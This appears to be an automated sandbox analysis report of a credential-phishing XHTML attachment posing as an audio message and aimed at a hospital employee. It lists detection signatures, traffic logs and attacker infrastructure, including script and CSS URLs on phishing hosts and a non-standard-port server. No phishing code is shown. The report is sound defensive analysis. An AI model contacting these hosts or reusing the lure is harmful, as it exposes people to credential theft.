Edit tour

Windows Analysis Report
#Ud83d#Udd0aAudio_Msg Overlakehospital.xhtml

Overview

General Information

Sample name:#Ud83d#Udd0aAudio_Msg Overlakehospital.xhtml
renamed because original name is a hash value
Original sample name:Audio_Msg Overlakehospital.xhtml
Analysis ID:1647567
MD5:fcf18e5b0d81714edb271ffe7f629a78
SHA1:1509c2e7e8a7d94eb5ca1d303bc83b7b91907cfb
SHA256:cfdd007fa301bad4bb8eef350ebd3d59b98d7aa4893b34f7253d3f1eba806ccb
Infos:

Detection

HTMLPhisher
Score:68
Range:0 - 100
Confidence:100%

Signatures

AI detected phishing page
Yara detected HtmlPhish10
HTML IFrame injector detected
HTML Script injector detected
Suspicious Javascript code found in HTML file
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
HTML body contains low number of good links
HTML body contains password input but no form action
Invalid 'forgot password' link found
No HTML title found
None HTTPS page querying sensitive user data (password, username or email)

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64_ra
  • chrome.exe (PID: 6992 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\Desktop\#UD83D~1.XHT MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 6196 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2036,i,7491096047911661366,14136041769639215097,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=1888 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • cleanup
SourceRuleDescriptionAuthorStrings
0.3.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
    0.4.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
      0.5.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
        0.6.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
          No Sigma rule has matched
          No Suricata rule has matched

          Click to jump to signature section

          Show All Signature Results

          Phishing

          barindex
          Source: file:///C:/Users/user/Desktop/%23UD83D~1.XHTJoe Sandbox AI: Score: 10 Reasons: HTML file with login form DOM: 0.5.pages.csv
          Source: Yara matchFile source: 0.3.pages.csv, type: HTML
          Source: Yara matchFile source: 0.4.pages.csv, type: HTML
          Source: Yara matchFile source: 0.5.pages.csv, type: HTML
          Source: Yara matchFile source: 0.6.pages.csv, type: HTML
          Source: file:///C:/Users/user/Desktop/%23UD83D~1.XHTHTTP Parser: New IFrame
          Source: file:///C:/Users/user/Desktop/%23UD83D~1.XHTHTTP Parser: New script, src: https://office.avcbtech.store/kuk/xls/k1u2k.js?uid=eric.teshima@overlakehospital.org
          Source: file:///C:/Users/user/Desktop/%23UD83D~1.XHTHTTP Parser: New script, src: https://office.avcbtech.store/kuk/xls/k1u2k.js?uid=eric.teshima@overlakehospital.org
          Source: file:///C:/Users/user/Desktop/%23UD83D~1.XHTHTTP Parser: New script, src: https://office.avcbtech.store/kuk/xls/k1u2k.js?uid=eric.teshima@overlakehospital.org
          Source: file:///C:/Users/user/Desktop/%23UD83D~1.XHTHTTP Parser: New script, src: https://office.avcbtech.store/kuk/xls/k1u2k.js?uid=eric.teshima@overlakehospital.org
          Source: file:///C:/Users/user/Desktop/%23UD83D~1.XHTHTTP Parser: New script, src: https://office.avcbtech.store/kuk/xls/k1u2k.js?uid=eric.teshima@overlakehospital.org
          Source: #Ud83d#Udd0aAudio_Msg Overlakehospital.xhtmlHTTP Parser: .location
          Source: #Ud83d#Udd0aAudio_Msg Overlakehospital.xhtmlHTTP Parser: .location
          Source: file:///C:/Users/user/Desktop/%23UD83D~1.XHTHTTP Parser: Number of links: 0
          Source: file:///C:/Users/user/Desktop/%23UD83D~1.XHTHTTP Parser: <input type="password" .../> found but no <form action="...
          Source: file:///C:/Users/user/Desktop/%23UD83D~1.XHTHTTP Parser: Invalid link: Forgot Password?
          Source: file:///C:/Users/user/Desktop/%23UD83D~1.XHTHTTP Parser: HTML title missing
          Source: file:///C:/Users/user/Desktop/%23UD83D~1.XHTHTTP Parser: HTML title missing
          Source: file:///C:/Users/user/Desktop/%23UD83D~1.XHTHTTP Parser: HTML title missing
          Source: file:///C:/Users/user/Desktop/%23UD83D~1.XHTHTTP Parser: HTML title missing
          Source: file:///C:/Users/user/Desktop/%23UD83D~1.XHTHTTP Parser: Has password / email / username input fields
          Source: file:///C:/Users/user/Desktop/%23UD83D~1.XHTHTTP Parser: <input type="password" .../> found
          Source: #Ud83d#Udd0aAudio_Msg Overlakehospital.xhtmlHTTP Parser: No favicon
          Source: file:///C:/Users/user/Desktop/%23UD83D~1.XHTHTTP Parser: No favicon
          Source: file:///C:/Users/user/Desktop/%23UD83D~1.XHTHTTP Parser: No favicon
          Source: file:///C:/Users/user/Desktop/%23UD83D~1.XHTHTTP Parser: No favicon
          Source: file:///C:/Users/user/Desktop/%23UD83D~1.XHTHTTP Parser: No favicon
          Source: file:///C:/Users/user/Desktop/%23UD83D~1.XHTHTTP Parser: No favicon
          Source: file:///C:/Users/user/Desktop/%23UD83D~1.XHTHTTP Parser: No favicon
          Source: file:///C:/Users/user/Desktop/%23UD83D~1.XHTHTTP Parser: No favicon
          Source: file:///C:/Users/user/Desktop/%23UD83D~1.XHTHTTP Parser: No <meta name="author".. found
          Source: file:///C:/Users/user/Desktop/%23UD83D~1.XHTHTTP Parser: No <meta name="author".. found
          Source: file:///C:/Users/user/Desktop/%23UD83D~1.XHTHTTP Parser: No <meta name="author".. found
          Source: file:///C:/Users/user/Desktop/%23UD83D~1.XHTHTTP Parser: No <meta name="author".. found
          Source: file:///C:/Users/user/Desktop/%23UD83D~1.XHTHTTP Parser: No <meta name="copyright".. found
          Source: file:///C:/Users/user/Desktop/%23UD83D~1.XHTHTTP Parser: No <meta name="copyright".. found
          Source: file:///C:/Users/user/Desktop/%23UD83D~1.XHTHTTP Parser: No <meta name="copyright".. found
          Source: file:///C:/Users/user/Desktop/%23UD83D~1.XHTHTTP Parser: No <meta name="copyright".. found
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\Chrome\Application\Dictionaries
          Source: unknownHTTPS traffic detected: 139.28.36.38:443 -> 192.168.2.16:49705 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 139.28.36.38:443 -> 192.168.2.16:49706 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 139.28.36.38:443 -> 192.168.2.16:49708 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 139.28.36.38:443 -> 192.168.2.16:49716 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 185.174.100.20:443 -> 192.168.2.16:49719 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 185.174.100.20:443 -> 192.168.2.16:49719 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 151.101.2.137:443 -> 192.168.2.16:49721 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 142.251.35.164:443 -> 192.168.2.16:49722 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 199.232.192.193:443 -> 192.168.2.16:49723 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 199.232.192.193:443 -> 192.168.2.16:49724 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 199.232.196.193:443 -> 192.168.2.16:49728 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 199.232.196.193:443 -> 192.168.2.16:49727 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.16:49734 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.16:49735 version: TLS 1.2
          Source: chrome.exeMemory has grown: Private usage: 0MB later: 39MB
          Source: global trafficTCP traffic: 192.168.2.16:49733 -> 185.174.100.76:8248
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
          Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
          Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
          Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
          Source: unknownTCP traffic detected without corresponding DNS query: 142.250.65.163
          Source: unknownTCP traffic detected without corresponding DNS query: 142.250.65.163
          Source: global trafficHTTP traffic detected: GET /kuk/xls/k1u2k.js?uid=eric.teshima@overlakehospital.org HTTP/1.1Host: office.avcbtech.storeConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /start/xls/includes/css6.css HTTP/1.1Host: sender.linxcoded.topConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleSec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /jquery-3.1.1.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /0HdPsKK.png HTTP/1.1Host: i.imgur.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /KAb5SEy.png HTTP/1.1Host: i.imgur.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /0HdPsKK.png HTTP/1.1Host: i.imgur.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /KAb5SEy.png HTTP/1.1Host: i.imgur.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: application/json, text/javascript, */*; q=0.01sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: global trafficDNS traffic detected: DNS query: office.avcbtech.store
          Source: global trafficDNS traffic detected: DNS query: sender.linxcoded.top
          Source: global trafficDNS traffic detected: DNS query: code.jquery.com
          Source: global trafficDNS traffic detected: DNS query: www.google.com
          Source: global trafficDNS traffic detected: DNS query: i.imgur.com
          Source: global trafficDNS traffic detected: DNS query: server1.linxcoded.top
          Source: global trafficDNS traffic detected: DNS query: _8248._https.server1.linxcoded.top
          Source: global trafficDNS traffic detected: DNS query: api.ipify.org
          Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
          Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
          Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
          Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
          Source: unknownNetwork traffic detected: HTTP traffic on port 49679 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
          Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
          Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
          Source: unknownHTTPS traffic detected: 139.28.36.38:443 -> 192.168.2.16:49705 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 139.28.36.38:443 -> 192.168.2.16:49706 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 139.28.36.38:443 -> 192.168.2.16:49708 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 139.28.36.38:443 -> 192.168.2.16:49716 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 185.174.100.20:443 -> 192.168.2.16:49719 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 185.174.100.20:443 -> 192.168.2.16:49719 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 151.101.2.137:443 -> 192.168.2.16:49721 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 142.251.35.164:443 -> 192.168.2.16:49722 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 199.232.192.193:443 -> 192.168.2.16:49723 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 199.232.192.193:443 -> 192.168.2.16:49724 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 199.232.196.193:443 -> 192.168.2.16:49728 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 199.232.196.193:443 -> 192.168.2.16:49727 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.16:49734 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.16:49735 version: TLS 1.2
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\scoped_dir6992_199307002
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile deleted: C:\Windows\SystemTemp\scoped_dir6992_199307002
          Source: classification engineClassification label: mal68.phis.winXHTML@19/9@18/201
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Program Files\Google\Chrome\Application\Dictionaries
          Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\Desktop\#UD83D~1.XHT
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2036,i,7491096047911661366,14136041769639215097,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=1888 /prefetch:3
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2036,i,7491096047911661366,14136041769639215097,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=1888 /prefetch:3
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\Chrome\Application\Dictionaries
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath Interception1
          Process Injection
          12
          Masquerading
          OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
          Encrypted Channel
          Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
          Extra Window Memory Injection
          1
          Process Injection
          LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
          Non-Standard Port
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
          File Deletion
          Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive2
          Non-Application Layer Protocol
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
          Extra Window Memory Injection
          NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
          Application Layer Protocol
          Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsInternet Connection DiscoverySSHKeylogging1
          Ingress Tool Transfer
          Scheduled TransferData Encrypted for Impact

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
          SourceDetectionScannerLabelLink
          file:///C:/Users/user/Desktop/%23UD83D~1.XHT0%Avira URL Cloudsafe
          https://sender.linxcoded.top/start/xls/includes/css6.css0%Avira URL Cloudsafe
          https://office.avcbtech.store/kuk/xls/k1u2k.js?uid=eric.teshima@overlakehospital.org0%Avira URL Cloudsafe
          NameIPActiveMaliciousAntivirus DetectionReputation
          s-part-0012.t-0009.t-msedge.net
          13.107.246.40
          truefalse
            high
            office.avcbtech.store
            139.28.36.38
            truefalse
              high
              code.jquery.com
              151.101.2.137
              truefalse
                high
                server1.linxcoded.top
                185.174.100.76
                truefalse
                  high
                  www.google.com
                  142.251.35.164
                  truefalse
                    high
                    api.ipify.org
                    172.67.74.152
                    truefalse
                      high
                      sender.linxcoded.top
                      185.174.100.20
                      truefalse
                        high
                        ipv4.imgur.map.fastly.net
                        199.232.192.193
                        truefalse
                          high
                          i.imgur.com
                          unknown
                          unknownfalse
                            high
                            _8248._https.server1.linxcoded.top
                            unknown
                            unknownfalse
                              unknown
                              NameMaliciousAntivirus DetectionReputation
                              https://i.imgur.com/0HdPsKK.pngfalse
                                high
                                https://office.avcbtech.store/kuk/xls/k1u2k.js?uid=eric.teshima@overlakehospital.orgtrue
                                • Avira URL Cloud: safe
                                unknown
                                https://sender.linxcoded.top/start/xls/includes/css6.cssfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://i.imgur.com/KAb5SEy.pngfalse
                                  high
                                  file:///C:/Users/user/Desktop/%23UD83D~1.XHTtrue
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://code.jquery.com/jquery-3.1.1.min.jsfalse
                                    high
                                    https://api.ipify.org/?format=jsonfalse
                                      high
                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs
                                      IPDomainCountryFlagASNASN NameMalicious
                                      1.1.1.1
                                      unknownAustralia
                                      13335CLOUDFLARENETUSfalse
                                      13.107.246.40
                                      s-part-0012.t-0009.t-msedge.netUnited States
                                      8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                      185.174.100.20
                                      sender.linxcoded.topUkraine
                                      8100ASN-QUADRANET-GLOBALUSfalse
                                      199.232.192.193
                                      ipv4.imgur.map.fastly.netUnited States
                                      54113FASTLYUSfalse
                                      142.250.176.206
                                      unknownUnited States
                                      15169GOOGLEUSfalse
                                      139.28.36.38
                                      office.avcbtech.storeUkraine
                                      42331FREEHOSTUAfalse
                                      142.250.80.74
                                      unknownUnited States
                                      15169GOOGLEUSfalse
                                      199.232.196.193
                                      unknownUnited States
                                      54113FASTLYUSfalse
                                      142.250.80.99
                                      unknownUnited States
                                      15169GOOGLEUSfalse
                                      142.250.80.78
                                      unknownUnited States
                                      15169GOOGLEUSfalse
                                      185.174.100.76
                                      server1.linxcoded.topUkraine
                                      8100ASN-QUADRANET-GLOBALUSfalse
                                      151.101.2.137
                                      code.jquery.comUnited States
                                      54113FASTLYUSfalse
                                      142.250.80.3
                                      unknownUnited States
                                      15169GOOGLEUSfalse
                                      142.251.35.164
                                      www.google.comUnited States
                                      15169GOOGLEUSfalse
                                      142.250.176.195
                                      unknownUnited States
                                      15169GOOGLEUSfalse
                                      172.253.115.84
                                      unknownUnited States
                                      15169GOOGLEUSfalse
                                      172.67.74.152
                                      api.ipify.orgUnited States
                                      13335CLOUDFLARENETUSfalse
                                      IP
                                      192.168.2.16
                                      192.168.2.13
                                      192.168.2.23
                                      Joe Sandbox version:42.0.0 Malachite
                                      Analysis ID:1647567
                                      Start date and time:2025-03-25 00:37:11 +01:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Number of analysed new started processes analysed:16
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • EGA enabled
                                      Analysis Mode:stream
                                      Analysis stop reason:Timeout
                                      Sample name:#Ud83d#Udd0aAudio_Msg Overlakehospital.xhtml
                                      renamed because original name is a hash value
                                      Original Sample Name:Audio_Msg Overlakehospital.xhtml
                                      Detection:MAL
                                      Classification:mal68.phis.winXHTML@19/9@18/201
                                      Cookbook Comments:
                                      • Found application associated with file extension: .xhtml
                                      • Exclude process from analysis (whitelisted): svchost.exe
                                      • Excluded IPs from analysis (whitelisted): 142.250.176.206, 172.253.115.84, 142.250.80.3, 142.250.80.78, 142.251.41.14, 142.251.32.110, 142.250.80.74, 142.251.40.110, 13.107.246.40
